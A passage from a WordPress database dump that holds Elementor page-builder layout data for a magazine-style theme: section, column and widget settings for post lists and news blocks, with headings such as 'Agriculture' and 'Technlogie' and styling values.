2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1265,452,'_elementor_version','0.4'),(1266,452,'_elementor_css','a:3:{s:4:\"time\";i:1508893715;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1268,453,'_elementor_edit_mode','builder'),(1269,453,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\",\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\"